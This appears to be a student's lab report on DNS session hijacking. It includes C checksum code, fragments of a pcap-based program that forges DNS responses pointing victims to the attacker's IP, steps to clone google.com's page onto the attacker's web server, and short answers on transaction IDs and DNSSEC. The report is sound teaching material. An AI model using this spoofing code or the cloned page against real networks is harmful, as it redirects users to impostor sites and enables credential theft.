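    return fold(ones_sum(udp, ulen, s)) == 0xffff;
}

/* Constructed sample (not a capture): the lab's request, 1.2.3.4:4000 -> 6.7.8.9:53,
 * txid 0xAABB, one question for vnexpress.net A/IN. 31 DNS bytes give UDP length 39,
 * an odd length that exercises the padding rule. */
#define SAMPLE_LEN 39
const uint8_t sample_src[4] = {1, 2, 3, 4};
const uint8_t sample_dst[4] = {6, 7, 8, 9};
uint8_t sample_udp[SAMPLE_LEN] = {
    0x0f, 0xa0, 0x00, 0x35, 0x00, 0x27, 0x00, 0x00,          /* sport 4000, dport 53, len 39, sum 0 */
    0xaa, 0xbb, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,    /* DNS header: txid, flags, qdcount 1 */
    9, 'v','n','e','x','p','r','e','s','s', 3, 'n','e','t', 0, /* qname */
    0x00, 0x01, 0x00, 0x01 };                                /* QTYPE A, QCLASS IN */

/* Fill in the sample's checksum and report whether the receiver check accepts it. */
int sample_roundtrip(void)
{
    uint16_t c = udp_checksum(sample_src, sample_dst, sample_udp, SAMPLE_LEN);
    sample_udp[6] = (uint8_t)(c >> 8);
    sample_udp[7] = (uint8_t)(c & 0xff);
    return udp_checksum_valid(sample_src, sample_dst, sample_udp, SAMPLE_LEN);
}

/* Change one payload byte after the checksum was set: the check must now fail. */
int sample_tampered(void)
{
    uint8_t copy[SAMPLE_LEN];
    sample_roundtrip();
    memcpy(copy, sample_udp, SAMPLE_LEN);
    copy[SAMPLE_LEN - 1] ^= 0x03;              /* QCLASS 1 -> 2, the lone padded byte */
    return udp_checksum_valid(sample_src, sample_dst, copy, SAMPLE_LEN);
}

/* Known-answer test for the IP side: the standard IPv4 worked example whose checksum is 0xb861. */
const uint8_t known_ip_hdr[20] = { 0x45,0x00,0x00,0x73, 0x00,0x00,0x40,0x00, 0x40,0x11,0x00,0x00,
                                   0xc0,0xa8,0x00,0x01, 0xc0,0xa8,0x00,0xc7 };

int main(void)
{
    printf("ip checksum 0x%04x (expect 0xb861)\n", ip_checksum(known_ip_hdr, 20));
    printf("udp roundtrip %d, tampered %d (expect 1, 0)\n", sample_roundtrip(), sample_tampered());
    return 0;
}
```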
Part II: DNS attack

Normal scenario: hereafter are the steps for the user on Host1 to connect to a website, e.g. GMAIL.
• On Host1, the user enters www.gmail.com in the browser.
• Host1 asks Host2 for the IP address of www.gmail.com.
• Host2 returns the IP address of www.google.com (ipgoogle) to Host1.
• Host1 connects to (ipgoogle).

Attack scenario
• The user enters www.gmail.com in the browser.
• Host3 sniffs the traffic on the wire and tries to do DNS session hijacking by racing against Host2. In fact, it tries to provide a fake answer to Host1 (Host3 returns its own IP address (ip3) instead of the actual IP address of gmail (ipgoogle) to Host1).
• Host1 receives the fake answer from Host3 and connects to Host3 (ip3), believing that it is talking to www.google.com.

Task 1: Create a program running on Host3, called dnsattack.c, which
• captures the network traffic and filters out the DNS packets (get the code from Lab3-part1)
• creates the fake response packet with the information mentioned above (get the code from Lab3-part1)
• sends the fake packet to Host1
To help you in creating the program, I sent you the example dnsattack.c program. You need to add the appropriate code at the different places where I have marked "TO BE MODIFIED".
Answer: Dntai_dns_attack.c (the parts written for this lab; the rest is the lecturer's dnsattack.c skeleton)

/* The ethernet_header, ip_header, udp_header, dns_header, dns_query and dns_answer structs,
   the IP_HL / IP_V macros and the #defines are the same as in the listings of Part I. */

pcap_t *handle;                     /* packet capture handle */

/* functions */
void print_app_info(void);
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);
/* csum() and udp_csum() are identical to Dntai_dns_request_v2.c above and are not repeated here. */

/* Inverse of DNS_name_converter: turn the label sequence "\x09vnexpress\x03net\x00" of a
   captured query back into "vnexpress.net". q_name must be a plain label sequence
   (no compression pointers), which is what a query's question section carries. */
char *dns_name_revert(char *q_name, char *host)
{
    int count, len, first, i;
    count = 0;
    len   = 0;
    first = q_name[count];          // length of the first label
    count++;
    while(first>0){
        for(i=0; i<first; i++){     // copy one label
            host[len] = q_name[count];
            len++;
            count++;
        }
        first = q_name[count];      // length of the next label (0 terminates the name)
        count++;
        if(first>0) {               // put a dot between labels
            host[len] = '.';
            len++;
        }
    }
    host[len] = 0;
    return host;
}
- Modified code 2:

    // TO BE MODIFIED 2: your code to swap the IP addresses
    struct in_addr ip_addr_tmp;
    ip_addr_tmp = ip->ip_src;
    ip->ip_src  = ip->ip_dst;
    ip->ip_dst  = ip_addr_tmp;

- Modified code 3:

    // TO BE MODIFIED 3: your code to swap the udp ports
    u_short port_tmp;
    port_tmp       = udp->udp_sport;
    udp->udp_sport = udp->udp_dport;
    udp->udp_dport = port_tmp;

- Modified code 4:

    /* http://www.binarytides.com/c-program-to-get-ip-address-from-interface-name-on-linux/ */
    #include <net/if.h>
    #include <sys/ioctl.h>
    char *get_ip_address(char *iface, char *buf)
    {
        struct ifreq ifr;
        int fd = socket(AF_INET, SOCK_DGRAM, 0);
        // type of address to retrieve - IPv4 IP address
        ifr.ifr_addr.sa_family = AF_INET;
        // Copy the interface name into the ifreq structure
        strncpy(ifr.ifr_name, iface, IFNAMSIZ-1);
        ifr.ifr_name[IFNAMSIZ-1] = 0;
        ioctl(fd, SIOCGIFADDR, &ifr);
        close(fd);
        // result
        strcpy(buf, inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
        return buf;
    }

    void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
    {
        /* ... (unchanged skeleton code omitted in the report) ... */
        // TO BE MODIFIED 4: change the ip address as required
        dns_as->a_addr.s_addr = inet_addr((char *)args);   // args carries the attacker's own address
        /* ... */
    }

    int main(int argc, char *argv[])
    {
        /* ... */
        char ip_current_address[20];
        /* ... */
        get_ip_address(dev, ip_current_address);
        printf("Current IP Address: %s\n", ip_current_address);
        /* ... */
        /* now we can set our callback function */
        pcap_loop(handle, num_packets, got_packet, (u_char *)ip_current_address);
        /* ... */
    }

- Modified code Extra:

    /* dns_name_revert() as listed above, plus the send step at the end of got_packet(): */
        result = pcap_sendpacket(handle, new_packet, SIZE_ETH + ntohs(ip->ip_len));
        if(result == 0) printf("[Packet sent sucessfully]\n");
        else            printf("[Packet sent failure]\n");
    } else {
        printf("[Packet doesn't sent]\n");
    }
Task 2: Install a web server on Host3 and create a home page to make it look like www.gmail.com.
Answer: On Host2

    $ sudo apt-get install apache2
    $ sudo service apache2 start
    $ cd /var/www/
    $ sudo su root
    $ wget google.com -O index.html
Task 3: Test and make sure your attack works.
- On Host3, run sudo ./dntai_dns_attack
- On Host1, open a terminal.
• Type nslookup google.com (the attacker redirects the DNS of google)
• Type nslookup vnexpress.net
• Open Firefox and type google.com in the address bar
• Screen on Host1 (screenshot not reproduced here)
Question 1: Compare the DNS request and DNS response with respect to a) source MAC address and destination MAC address, b) IP source and IP destination, c) source port and destination port.
Answer (screenshots not reproduced here)
• DNS request vs DNS response, MAC address: Request / Response
• DNS request vs DNS response, IP address: Request / Response
• DNS request vs DNS response, port: Request / Response
• Result: the DNS request and response swap source and destination MAC address, IP address and port.

Question 2: What is the role of the Transaction ID field of the DNS packet?
Answer: The Transaction ID is a 16-bit field identifying a specific DNS transaction. The transaction ID is created by the message originator and is copied by the responder into its response message. Using the transaction ID, the DNS client can match responses to its requests.

Question 3: Find a solution to prevent the DNS session hijacking attack.
Answer: A solution to prevent the DNS session hijacking attack is DNSSEC: The Domain Name System Security Extensions (DNSSEC) is a suite of Internet Engineering Task Force (IETF) specifications for securing certain kinds of information provided by the Domain Name System (DNS) as used on Internet Protocol (IP) networks. It is a set of extensions to DNS which provide to DNS clients (resolvers) origin authentication of DNS data, authenticated denial of existence, and data integrity, but not availability or confidentiality. (Wiki)